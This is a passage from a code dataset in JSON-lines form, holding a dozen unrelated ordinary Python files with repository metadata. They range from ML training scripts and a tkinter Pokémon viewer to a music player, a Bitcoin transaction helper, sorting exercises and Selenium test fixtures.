proposed_model_mode=args.proposed_model_mode,\n idk_mode=args.idk_mode,\n )\n valid_so_losses.append(valid_so_loss.item())\n valid_prg_losses.append(valid_prg_loss.item())\n\n # --------------------\n # Model Saving\n # --------------------\n epoch_loss = mean(valid_so_losses) + mean(valid_prg_losses)\n if epoch_loss < best_loss:\n # update model\n best_loss = epoch_loss\n early_stop_count = 0\n save_dict = {\n 'next_epoch': epoch + 1,\n 'best_loss': best_loss,\n 'optimizer': optimizer.state_dict(),\n }\n net.save_models(save_dict, args.save_guesser, args.save_generator)\n else:\n early_stop_count += 1\n if early_stop_count == args.patience:\n logger.info(f'Early Stopping: epoch {epoch}')\n break\n\n # logging\n msg = (\n 'epoch: {}/{} - lr: {:.6f} - '\n 'train_so_loss: {:.5f} - val_so_loss: {:.5f} - '\n 'train_prg_loss: {:.5f} - val_prg_loss: {:.5f} - '\n 'train_loss: {:.5f} - val_loss: {:.5f}'\n ).format(\n epoch,\n args.epochs,\n optimizer.state_dict()['param_groups'][0]['lr'],\n mean(train_so_losses),\n mean(valid_so_losses),\n mean(train_prg_losses),\n mean(valid_prg_losses),\n mean(train_so_losses) + mean(train_prg_losses),\n mean(valid_so_losses) + mean(valid_prg_losses),\n )\n logger.info(msg)\n\n # ----------------------\n # Logging wandb\n # ----------------------\n if not args.off_wandb:\n curr_lr = optimizer.state_dict()['param_groups'][0]['lr']\n logging_info_dict = {\n 'learning_rate': curr_lr,\n 'train_so_loss': mean(train_so_losses),\n 'valid_so_loss': mean(valid_so_losses),\n 'train_prg_loss': mean(train_prg_losses),\n 'valid_prg_loss': mean(valid_prg_losses),\n 'train_loss': mean(train_so_losses) + mean(train_prg_losses),\n 'valid_loss': mean(valid_so_losses) + mean(valid_prg_losses),\n 'best_loss': best_loss,\n }\n wandb.log(logging_info_dict)\n\n\ndef 
check_single_tf(args):\n \"\"\"\n Parameters\n ----------\n args : ArgumentParser\n \"\"\"\n seed_everything(args.seed)\n device = f'cuda:{args.gpu_id}' if torch.cuda.is_available() else 'cpu'\n logger.info(f'Detected device type: {device}')\n\n vocab = load_vocab(args.vocab_path)\n\n # Modeling\n spatial_dim = RICH_DIM if args.proposed_model_mode else BASE_DIM\n net = SingleNet(\n device,\n args.cropped_img_enc_dim + spatial_dim,\n vocab,\n args.ans_vocab_size,\n args.gen_seq_len,\n args.load_guesser,\n args.load_generator,\n args.proposed_q_gen_top_k,\n args.split_class_size,\n args.image_data_version,\n max_batch_size=args.batch_size,\n obj_memory_only=args.obj_memory_only,\n )\n\n oracle = Oracle(\n args.metadata_path,\n os.path.join('data/', args.image_data_version, args.scene_test_path),\n args.vocab_path,\n args.image_data_version,\n )\n\n # Data Loading\n test_loader = get_test_loader(args, multi_q_ver=True)\n\n for i_data, data in enumerate(tqdm(test_loader)):\n show_example = True if i_data == 0 else False\n net.check_results(\n data,\n oracle,\n args.proposed_model_mode,\n args.idk_mode,\n show_example=show_example\n )\n net.show_total_results()","repo_name":"smatsumori/uniqer","sub_path":"src/scripts/train_single_tf.py","file_name":"train_single_tf.py","file_ext":"py","file_size_in_byte":8218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"39852653387","text":"from tensorflow.keras import Model\r\nfrom tensorflow.keras.layers import Dense\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\nclass ACNetwork(Model):\r\n def __init__(self, num_actions):\r\n super(ACNetwork, self).__init__()\r\n self.num_actions = num_actions\r\n self.fc1 = Dense(1024, activation='relu')\r\n self.fc2 = Dense(512, activation='relu')\r\n self.softmax = Dense(num_actions, activation='softmax')\r\n self.value = Dense(1, activation='linear')\r\n\r\n def call(self, x):\r\n x = self.fc1(x)\r\n x = self.fc2(x)\r\n policy = self.softmax(x)\r\n value = self.value(x)\r\n return policy, value\r\n\r\nif __name__ == '__main__':\r\n network = ACNetwork(4)\r\n test = tf.ones((1, 4))\r\n policy, value = network(test)\r\n policy = policy.numpy()\r\n print(policy.shape)","repo_name":"Devanshu-singh-VR/Reinforcement-Learning-Mixed","sub_path":"Actor-Critic/ActorCritic(Tensorflow Torch)/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22490632282","text":"#The main difference between bubble sort and insertion sort is that\n#bubble sort performs sorting by checking the neighboring data elements and swapping them if they are in wrong order\n#while insertion sort performs sorting by transferring one element to a partially sorted array at a time.\n\n#BUBBLE SORT\nmyList = [15,24,62,53,25,12,51]\nmaxIndex = 6 #remember its maxIndex not max number of elements\nprint('This is the unsorted list ' + str(myList))\nn = maxIndex\nfor i in range(maxIndex):\n for j in range (n):\n if (myList[j] > myList[j+1]):\n temp = myList[j]\n myList[j] = myList[j+1]\n myList[j+1] = temp\n n-=1\n\nprint('This is the sorted list ' + str(myList))\n","repo_name":"nazhimkalam/Complete-Python-Crash-Couse-Tutorials-Available","sub_path":"completed Tutorials/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} 
+{"seq_id":"19778878163","text":"from tkinter import *\nfrom tkinter import ttk\nfrom poke_api import search_for_pokemon\nfrom tkinter import messagebox\n\n\n\nroot = Tk()\nroot.title(\"Pokèmon Information Viewer\")\nroot.resizable(False, False)\n\n# Add Frames to window\nfrm_top = ttk.Frame(root)\nfrm_top.grid(row=0, column=0, columnspan=2, pady=(20, 10))\n\nfrm_btm_left = ttk.LabelFrame(root, text='Info')\nfrm_btm_left.grid(row=1, column=0, padx=(20, 10), pady=(10, 20), sticky=N)\n\nfrm_btm_right = ttk.LabelFrame(root, text='Pokèmon Stats')\nfrm_btm_right.grid(row=1, column=1, padx=(10, 20), pady=(10, 20))\n\n\n#Add widgets to frames\nlbl_name = ttk.Label(frm_top, text='Pokèmon name:')\nlbl_name.grid(row=0, column=0, padx=(10,5), pady=10)\n\n# Create Entry box for Pokemon names\nent_name = ttk.Entry(frm_top)\nent_name.grid(row=0, column=1)\n\n# populate widgets in the info box.\nlbl_height = ttk.Label(frm_btm_left, text='Height:')\nlbl_height.grid(row=0, column=0, padx=(10,5), pady=10)\nlbl_height_value = ttk.Label(frm_btm_left, text='TBD:')\nlbl_height_value.grid(row=0, column=1, padx=(5,5), pady=10)\n\nlbl_weight = ttk.Label(frm_btm_left, text='Weight:')\nlbl_weight.grid(row=1, column=0, padx=(10,5), pady=10)\nlbl_weight_value = ttk.Label(frm_btm_left, text='TBD:')\nlbl_weight_value.grid(row=1, column=1, padx=(5,5), pady=10)\n\nlbl_type = ttk.Label(frm_btm_left, text='Type:')\nlbl_type.grid(row=2, column=0, padx=(10,5), pady=10)\nlbl_type_value = ttk.Label(frm_btm_left, text='TBD:')\nlbl_type_value.grid(row=2, column=1, padx=(5,5), pady=10)\n\n# Populate widgets in the stats frame. \nlbl_hp = ttk.Label(frm_btm_right, text='HP:')\nlbl_hp.grid(row=0, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_hp = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_hp.grid(row=0,column=1, padx=(0,10), pady=5)\n\nlbl_attack = ttk.Label(frm_btm_right, text='Attack:' )\nlbl_attack.grid(row=1, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_attack = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_attack.grid(row=1,column=1, padx=(0,10), pady=5)\n\nlbl_defense = ttk.Label(frm_btm_right, text='Defense:')\nlbl_defense.grid(row=2, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_defense.grid(row=2,column=1, padx=(0,10), pady=5)\n\nlbl_spec_atk = ttk.Label(frm_btm_right, text='Special Attack:')\nlbl_spec_atk.grid(row=3, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_spec_atk = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_spec_atk.grid(row=3,column=1, padx=(0,10), pady=5)\n\nlbl_spec_def = ttk.Label(frm_btm_right, text='Special Defense:')\nlbl_spec_def.grid(row=4, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_spec_def = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_spec_def.grid(row=4,column=1, padx=(0,10), pady=5)\n\nlbl_speed = ttk.Label(frm_btm_right, text='Speed:')\nlbl_speed.grid(row=5, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_speed = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_speed.grid(row=5,column=1, padx=(0,10), pady=5)\n\n# Create event handle for get info button\ndef handle_get_info():\n # Get Pokemon name entered by the user\n poke_name = ent_name.get().strip()\n if len(poke_name) == 0:\n return\n\n # get poke info from poke api\n poke_info = search_for_pokemon(poke_name)\n if poke_info is None:\n err_msg = f'unable to 
fetch information for {poke_name.capitalize()} from the PokeAPI.'\n messagebox.showinfo(title='Error', message=err_msg, icon='error')\n if poke_info is not None:\n type_list = [t['type']['name'] for t in poke_info['types']]\n poke_type = ', '.join(type_list).title()\n # Populate the info frame\n lbl_height_value['text'] = f\"{poke_info['height']} dm \"\n lbl_weight_value['text'] = f\"{poke_info['weight']} hg\"\n lbl_type_value['text'] = poke_type\n\n # Populate the stats frame\n bar_hp['value'] = poke_info['stats'][0]['base_stat']\n bar_attack['value'] = poke_info['stats'][1]['base_stat']\n bar_defense['value'] = poke_info['stats'][2]['base_stat']\n bar_spec_atk['value'] = poke_info['stats'][3]['base_stat']\n bar_spec_def['value'] = poke_info['stats'][4]['base_stat']\n bar_speed['value'] = poke_info['stats'][5]['base_stat']\n\n# Create Get info button\nbtn_get_info = ttk.Button(frm_top, text='Get Info', command=handle_get_info)\nbtn_get_info.grid(row=0, column=2, padx=10, pady=10)\n\n#loop until window is closed\nroot.mainloop()","repo_name":"Deryaus/COMP-593-Lab9","sub_path":"lab9.py","file_name":"lab9.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"12239639294","text":"from threading import Thread\nimport time \n# import datetime\nfrom mutagen.mp3 import MP3\nfrom pygame import mixer\n# import threading\nimport os \n\n\n#flag \npaused = 1\nvolume = 0.7\nkill_all = 0\nplay_time =0 \nsleep_timer = 0\n\nmusic_dir = f'{os.getcwd()}/musics/'\nmusic_list =sorted([x for x in os.listdir(music_dir) if x.split('.')[1]=='mp3'])\nprint(music_list)\nmusic_count = 0\ntotal_music = len(music_list)\n\n\n\n\n# Starting the mixer\n\n# Start playing the song\n\ndef play_for_once(path):\n mixer.init(22050)\n\n # Setting the volume\n mixer.music.set_volume(volume)\n mixer.music.load(path)\n mixer.music.play()\n time.sleep(MP3(path).info.length)\n # time.sleep(3)\n mixer.music.unload()\n mixer.stop()\n mixer.quit()\n # print('once fucntion done')\n\n\ndef play_maintain(mixer,count:int,step:int,total_music:int,music_list:list,music_dir:str):\n count = (count+step) % total_music\n mixer.music.stop()\n mixer.music.unload()\n mixer.music.load(music_dir+music_list[count])\n mixer.music.play()\n\n global sleep_timer\n global music_count\n global play_time \n\n sleep_timer = MP3(music_dir+music_list[count]).info.length\n music_count = count\n play_time = 0 \n return count\n\n\n\n\n\n\nclass MusicControl(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.daemon = True\n # self._stop_event = threading.Event()\n self.start()\n\n def run(self):\n print('thread started')\n mixer.init(22050)\n\n # Setting the volume\n \n global sleep_timer\n global paused \n global volume\n global music_count\n # Loading the song\n mixer.music.set_volume(volume)\n mixer.music.load(music_dir + music_list[music_count])\n sleep_timer = MP3(music_dir+music_list[music_count]).info.length\n \n mixer.music.play()\n paused = 0 \n\n\n while True:\t\n print('''m -> change menu \np -> play or pause\n> -> next song\n< -> prevous song\n+ -> volume up\n- -> volume down''')\n\n query = input(\" \")\n if query == 'p':\n # Pausing the music\n if not paused:\n mixer.music.pause()\t\n paused = 1\n # Resuming the music\n else:\n mixer.music.unpause()\n paused = 0 \n\n elif query == 'm':\n # Stop the mixer\n mixer.music.stop()\n mixer.quit()\n global kill_all \n kill_all = 1\n # mixer.quit()\n break\n \n elif query == '>':\n \n 
play_maintain(mixer,music_count,1,total_music,music_list,music_dir)\n\n elif query == \"<\":\n\n play_maintain(mixer,music_count,-1,total_music,music_list,music_dir)\n\n elif query == '+' :\n volume += .1\n mixer.music.set_volume(volume)\n elif query == '-' :\n volume -= 0.1\n mixer.music.set_volume(volume)\n \n \n\n\n\n\nclass MusicEnd(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.daemon = True\n # self._stop_event = threading.Event()\n self.start()\n def run(self):\n global sleep_timer\n global paused\n global play_time\n global kill_all\n # print(x,sleep_timer)\n while True:\n \n if not paused: play_time +=1\n # else: print('paused')\n if play_time > sleep_timer-1: \n # print(x,sleep_timer)\n # print('next')\n global music_count\n music_count = play_maintain(mixer,music_count,1,total_music,music_list,music_dir)\n play_time = 0\n time.sleep(2)\n time.sleep(1)\n if kill_all:\n break\n\n\n\n\n\n\nif __name__ == '__main__':\n\n MusicControl()\n time.sleep(.5)\n MusicEnd()\n while True:\n if kill_all:\n break \n pass\n","repo_name":"ahsankoushik/cane","sub_path":"music/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25134703055","text":"import typing\n\nfrom btcbargain import exceptions\nfrom btcbargain.input import BargainInput\nfrom btcbargain.output import BargainOutput\nfrom btcbargain.transaction import BargainTransaction\n\n\nOUTPUT_SIZE = 23\n\n\nclass BargainSealer:\n def __init__(\n self,\n *tx_inputs: BargainInput,\n output: typing.Optional[BargainOutput] = None,\n recipient_address=None\n ):\n self.tx_inputs = [x for x in tx_inputs]\n self.output = output\n self.recipient_address = recipient_address\n\n def add_recipient_address(self, address: str):\n self.recipient_address = address\n return self\n\n def add_signature_to_input(self, input_index: int, signature: str):\n self.tx_inputs[input_index].add_signature(signature)\n return self\n\n def to_json(self) -> typing.Dict:\n return {\n 'inputs': [i.to_json() for i in self.tx_inputs],\n 'output': self.output and self.output.to_json(),\n 'recipient_address': self.recipient_address\n }\n\n @property\n def signatures(self) -> typing.Dict:\n res = {}\n for i in self.tx_inputs:\n if i.signature:\n res[i.outpoint_hash + ':{}'.format(i.outpoint_index)] = i.signature\n return res\n\n def mount_transaction(self, transaction: BargainTransaction) -> 'BargainSealer':\n if not self.recipient_address:\n raise exceptions.MissingSealerRecipient\n gathering_amount = 0\n for participant in transaction.participants:\n gathering_amount += participant.paying_amount\n for i in participant.tx_inputs:\n self.tx_inputs.append(i.clone())\n transaction.sealer = self\n self._add_gathering_output(gathering_amount)\n return self\n\n def _add_gathering_output(self, amount: int):\n self.output = BargainOutput(self.recipient_address, amount, OUTPUT_SIZE)\n","repo_name":"gdassori/btc-bargain","sub_path":"btcbargain/sealer.py","file_name":"sealer.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"31416603737","text":"#!/usr/bin/python3\n\"\"\"\n\n This module has one function to print a square\n\n\"\"\"\n\n\ndef print_square(size):\n \"\"\"\n\n This function prints a square of size size\n\n Args:\n size: an int\n\n Raises:\n TypeError: if size is not an int\n ValueError: if size is less than 0\n\n \"\"\"\n if 
not isinstance(size, int):\n raise TypeError('size must be an integer')\n if size < 0:\n raise ValueError('size must be >= 0')\n for i in range(size):\n print('#' * size)\n","repo_name":"HusamDin/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"23447949395","text":"from random import random, randint #imports random\n\nnumber_list = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"15\"] #card name list\ncard_type_list = [\"clubs\", \"dimonds\", \"hearts\", \"spades\", \"joker\"] #card type list\n\nworkout_clubs = [\"crunches\", \"laying leg raises\", \"russian twist\"] #ab exercises\nworkout_dimonds = [\"squats\", \"forward lunges\", \"jump squats\", \"side lunges\", \"calf raises\"] #leg exercises\nworkout_hearts = [\"pushups\", \"dips\"] #chest exercises\nworkout_spades = [\"jumping jacks\"] #cardio exercises\nworkout_joker = [\"1 min wall sit\", \"1 min plank\"] #endurance exercises\n\n\nx = randint(0,12)\ny = randint(0,3)\n\n\nw = randint(0,2)\ni = randint(0,4)\nu = randint(0,1)\nz = 0\njoker = randint(0,1)\n\n\nif card_type_list[y] == \"clubs\":\n print(number_list[x], workout_clubs[w])\nelif card_type_list[y] == \"dimonds\":\n print(number_list[x], workout_dimonds[i])\nelif card_type_list[y] == \"hearts\":\n print(number_list[x], workout_hearts[u])\nelif card_type_list[y] == \"spades\":\n print(number_list[x], workout_spades[z])\nelse:\n print(workout_joker[joker])\n\n\n\n\n\n","repo_name":"PatrickBeilman/card_workout","sub_path":"card_workout.py","file_name":"card_workout.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"7610041696","text":"from math import sqrt\nfrom matplotlib import pyplot as plt\nfrom sklearn.datasets import make_blobs\nfrom sklearn.cluster import KMeans\n\n\"\"\"## Creating the dataset\"\"\"\n\nX, y = make_blobs(n_samples=500, centers=20, random_state=999)\nplt.scatter(X[:,0], X[:,1])\n\n\"\"\"## Function to compute the best number of clusters from the distances between points\"\"\"\n\ndef optimal_number_of_clusters(wcss):\n x1, y1 = 1, wcss[0]\n x2, y2 = 19, wcss[len(wcss)-1]\n distances = []\n for i in range(len(wcss)):\n x0 = i + 1\n y0 = wcss[i]\n numerator = abs((y2-y1)*x0 - (x2-x1)*y0 + x2*y1 - y2*x1)\n denominator = sqrt((y2 - y1)**2 + (x2 - x1)**2)\n distances.append(numerator/denominator)\n \n return distances.index(max(distances)) + 1\n\n\"\"\"## Build a list of distances and compute the ideal number of clusters\"\"\"\n\nwcss = []\nfor i in range(1, 20):\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\nn = optimal_number_of_clusters(wcss)\nprint(f'Number of optimal cluster is {n}')\n\n\"\"\"## Plot the distance curve to visualize the best number of clusters.\n## The ideal number sits at the \"elbow\" of the curve\n\"\"\"\n\nwcss = []\nfor i in range(1, 20):\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\nplt.plot(range(1, 20), wcss)\nplt.plot([1, 19],[wcss[0], wcss[len(wcss)-1]])\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.grid()\nplt.show()\n\n\"\"\"## Plot the clusters created by K-means\"\"\"\n\nkmeans = KMeans(n_clusters=5, init='k-means++', max_iter=300, n_init=10)\npred_y = kmeans.fit_predict(X)\nplt.scatter(X[:,0], X[:,1], c=pred_y)\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=200, c='red')\nprint(kmeans.cluster_centers_) #coordinates of centroid\nprint(kmeans.inertia_) # within-cluster sum of squares\nplt.show()","repo_name":"raffoliveira/Bootcamp-Data-Scientist","sub_path":"Module_1 - Fundamentos/Trabalho/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
+{"seq_id":"20684714066","text":"from zip_ll import __version__\nfrom zip_ll.zip_ll import LinkedList\n\n\ndef test_version():\n assert __version__ == '0.1.0'\n\n################################## both of them are not empty #######################################\ndef test_twoll():\n llist1 = LinkedList()\n llist2 = LinkedList()\n llist1.insert(1) \n llist1.insert(2)\n llist1.insert(3) \n llist2.insert(6)\n llist2.insert(7)\n llist2.insert(8)\n llist1.zip(p=llist1, q=llist2)\n actual = llist1.__str__()\n expected = '( 3 ) -> ( 8 ) -> ( 2 ) -> ( 7 ) -> ( 1 ) -> ( 6 ) -> None'\n assert actual == expected\n############################ one of them is empty ############################################\ndef test_twoll_one_empty():\n llist1 = LinkedList()\n llist2 = LinkedList()\n llist1.insert(1)\n llist1.insert(2)\n llist1.insert(3)\n llist1.insert(4)\n llist1.zip(p=llist1, q=llist2)\n actual = llist1.__str__()\n expected = '( 4 ) -> ( 3 ) -> ( 2 ) -> ( 1 ) -> None'\n assert actual == expected\n################################## two of them are empty ###########################################\ndef test_twoll_two_empty():\n llist1 = LinkedList()\n llist2 = LinkedList()\n llist1.zip(p=llist1, q=llist2)\n actual = llist1.__str__()\n expected = ''\n assert actual == expected\n#################################################################################################\n","repo_name":"Talafhamohammad-cloud/data-structures-and-algorithms-python","sub_path":"challenges/ch-08-zipll/zip-ll/zip-ll/tests/test_zip_ll.py","file_name":"test_zip_ll.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"30093360371","text":"import pandas as pd\nimport numpy as np\nimport time\n\n\n# parameters:\ndata_folder = \"data\"\nnrows = None\nstart_time = time.time()\n\nprior_order_details = pd.read_pickle(\n \"{}/prior_order_details.pickle\".format(data_folder)\n)\n\nproduct_1_temp = prior_order_details.groupby([\"product_id\"]).agg(\n {\n \"order_id\": [\"nunique\"],\n \"user_id\": [\"nunique\"],\n \"add_to_cart_order\": [\"mean\", \"std\"],\n \"reordered\": [\"mean\", \"sum\"],\n \"_up_purchase_order\": lambda x: np.sum(x == 2),\n }\n)\n\nproduct_1_temp.columns = (\n product_1_temp.columns.get_level_values(0)\n + \"_\"\n + product_1_temp.columns.get_level_values(1)\n)\nproduct_1 = product_1_temp.rename(\n columns={\n \"order_id_nunique\": \"p_num_purchases\",\n \"user_id_nunique\": \"p_unique_buyers\",\n \"add_to_cart_order_mean\": \"p_mean_add_cart_num\",\n \"add_to_cart_order_std\": \"p_std_add_cart_num\",\n \"reordered_mean\": \"p_reorder_rate\",\n \"reordered_sum\": \"p_sum_reordered\",\n \"_up_purchase_order_\": \"p_sum_secondtime_purchase\",\n }\n)\nproduct_1.reset_index(inplace=True)\n\nproduct_1[\"p_ratio_2nd_to_onetime_purchases\"] = (\n 
product_1[\"p_sum_secondtime_purchase\"] / product_1[\"p_unique_buyers\"]\n)\n\n# fist order and first reorder\nfirst_order = (\n prior_order_details.loc[prior_order_details[\"reordered\"] == 0]\n .groupby([\"product_id\", \"user_id\"])\n .agg({\"order_number\": \"min\"})\n)\nfirst_reorder = (\n prior_order_details.loc[prior_order_details[\"reordered\"] == 1]\n .groupby([\"product_id\", \"user_id\"])\n .agg({\"order_number\": \"min\"})\n)\n\nfirst_reorder_diff = (first_reorder - first_order).reset_index()\nfirst_reorder_diff = first_reorder_diff.groupby(\"product_id\").agg(\n {\"order_number\": [\"mean\", \"std\"]}\n)\nfirst_reorder_diff.columns = (\n first_reorder_diff.columns.get_level_values(0)\n + \"_\"\n + first_reorder_diff.columns.get_level_values(1)\n)\n\nfirst_reorder_diff = first_reorder_diff.rename(\n columns={\n \"order_number_mean\": \"p_avg_first_reorder_diff\",\n \"order_number_std\": \"p_std_first_reorder_diff\",\n }\n).reset_index()\n\n\np_first_order = (\n first_order.reset_index()\n .groupby(\"product_id\")\n .agg({\"order_number\": [\"mean\", \"std\"]})\n)\n\np_first_order.columns = (\n p_first_order.columns.get_level_values(0)\n + \"_\"\n + p_first_order.columns.get_level_values(1)\n)\n\np_first_order = p_first_order.rename(\n columns={\n \"order_number_mean\": \"p_avg_first_order_num\",\n \"order_number_std\": \"p_std_first_order_num\",\n }\n).reset_index()\n\n\np_first_reorder = (\n first_reorder.reset_index()\n .groupby(\"product_id\")\n .agg({\"order_number\": [\"mean\", \"std\"]})\n)\n\np_first_reorder.columns = (\n p_first_reorder.columns.get_level_values(0)\n + \"_\"\n + p_first_reorder.columns.get_level_values(1)\n)\n\np_first_reorder = p_first_reorder.rename(\n columns={\n \"order_number_mean\": \"p_avg_first_reorder_num\",\n \"order_number_std\": \"p_std_first_reorder_num\",\n }\n).reset_index()\n\nproduct_features = (\n product_1.merge(p_first_order, how=\"left\")\n .merge(p_first_reorder, how=\"left\")\n .merge(first_reorder_diff, how=\"left\")\n)\n\n# For products that were only ordered once or have never been re-ordered,\n# their std or average features are calculated as null, replace them with 0\nproduct_features.fillna(0, inplace=True)\n\nproduct_features.to_pickle(\"{}/product_features_basic_agg.pickle\".format(data_folder))\n\nend_time = time.time()\ntime_spent = (end_time - start_time) / 60\nprint(\"spent {:.2f} mins\".format(time_spent))\n","repo_name":"goqiao/Instacart-Market-Basket-Analysis","sub_path":"201_product_basic.py","file_name":"201_product_basic.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"42560652347","text":"import os.path\nimport shutil\nimport sys\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom _pytest.fixtures import FixtureRequest\n\nimport data\nfrom ui.pages.base_page import BasePage\nfrom ui.pages.dashboard_page import DashboardPage\nfrom ui.pages.login_page import LoginPage\nfrom ui.pages.campaign_page import CampaignPage\nfrom ui.pages.segments_page import (\n SegmentsPage,\n SegmentsListPage,\n SegmentsListNewPage,\n)\nfrom generators.value_generator import (\n DataAuth,\n DataCampaign,\n DataSegments,\n)\n\n\ndef pytest_configure(config):\n if sys.platform.startswith('win'):\n base_dir = r'C:\\tests'\n else:\n base_dir = '/tmp/tests'\n if not 
hasattr(config, 'workerunput'):\n if os.path.exists(base_dir):\n shutil.rmtree(base_dir)\n os.makedirs(base_dir)\n\n config.base_temp_dir = base_dir\n\n\n@pytest.fixture()\ndef driver(config, temp_dir):\n browser = config['browser']\n url = config['url']\n selenoid = config['selenoid']\n vnc = config['vnc']\n options = Options()\n options.add_experimental_option(\"prefs\", {\"download.default_directory\": temp_dir})\n if selenoid:\n capabilities = {\n \"browserName\": \"chrome\",\n 'version': '98.0',\n }\n if vnc:\n capabilities['enableVNC'] = True\n driver = webdriver.Remote(\n 'http://127.0.0.1:4444/wd/hub',\n options=options,\n desired_capabilities=capabilities,\n )\n elif browser == 'chrome':\n driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)\n elif browser == 'firefox':\n driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n else:\n raise RuntimeError(f'Unsupported browser: \"{browser}\"')\n driver.get(url)\n driver.maximize_window()\n yield driver\n driver.quit()\n\n\n@pytest.fixture\ndef base_page(driver):\n return BasePage(driver=driver)\n\n\n@pytest.fixture\ndef dashboard_page(driver):\n return DashboardPage(driver=driver)\n\n\n@pytest.fixture\ndef login_page(driver):\n return LoginPage(driver=driver)\n\n\n@pytest.fixture\ndef campaign_page(driver):\n return CampaignPage(driver=driver)\n\n\n@pytest.fixture\ndef segments_page(driver):\n return SegmentsPage(driver=driver)\n\n\n@pytest.fixture\ndef segments_list_page(driver):\n return SegmentsListPage(driver=driver)\n\n\n@pytest.fixture\ndef segments_list_new_page(driver):\n return SegmentsListNewPage(driver=driver)\n\n\ndef get_driver(brower_name):\n if brower_name == 'chrome':\n browser = webdriver.Chrome(executable_path=ChromeDriverManager(\n ).install())\n elif brower_name == 'firefox':\n browser = webdriver.Firefox(executable_path=GeckoDriverManager(\n ).install())\n else:\n raise RuntimeError(f'Unsupported browser: \"{brower_name}\"')\n browser.maximize_window()\n\n return browser\n\n\n@pytest.fixture(scope='session', params=['chrome', 'firefox'])\ndef all_drivers(config, request):\n url = config['url']\n browser = get_driver(request.param)\n browser.get(url)\n yield browser\n browser.quit()\n\n\n@pytest.fixture(scope='session')\ndef credentials():\n user = data.VALID_LOGIN\n password = data.VALID_PASSWORD\n return user, password\n\n\n@pytest.fixture(scope='function')\ndef fake_credentials():\n generator = DataAuth()\n data_auth = generator.build()\n return data_auth\n\n\n@pytest.fixture(scope='session')\ndef data_campaign():\n generator = DataCampaign()\n return generator.build()\n\n\n@pytest.fixture(scope='session')\ndef data_segments():\n generator = DataSegments()\n return generator.build()\n\n\n@pytest.fixture()\ndef file_path(repo_root):\n return os.path.join(repo_root, 'files', 'banner.jpg')\n\n\n@pytest.fixture(scope='session')\ndef cookies(credentials, config):\n driver = get_driver(config['browser'])\n driver.get(config['url'])\n login_page = LoginPage(driver)\n login_page.authorization(*credentials)\n\n cookies = driver.get_cookies()\n driver.quit()\n\n return cookies\n\n\n@pytest.fixture(scope='function')\ndef auth(request: FixtureRequest, driver):\n cookies = request.getfixturevalue('cookies')\n for cookie in cookies:\n driver.add_cookie(cookie)\n driver.refresh()\n\n return 
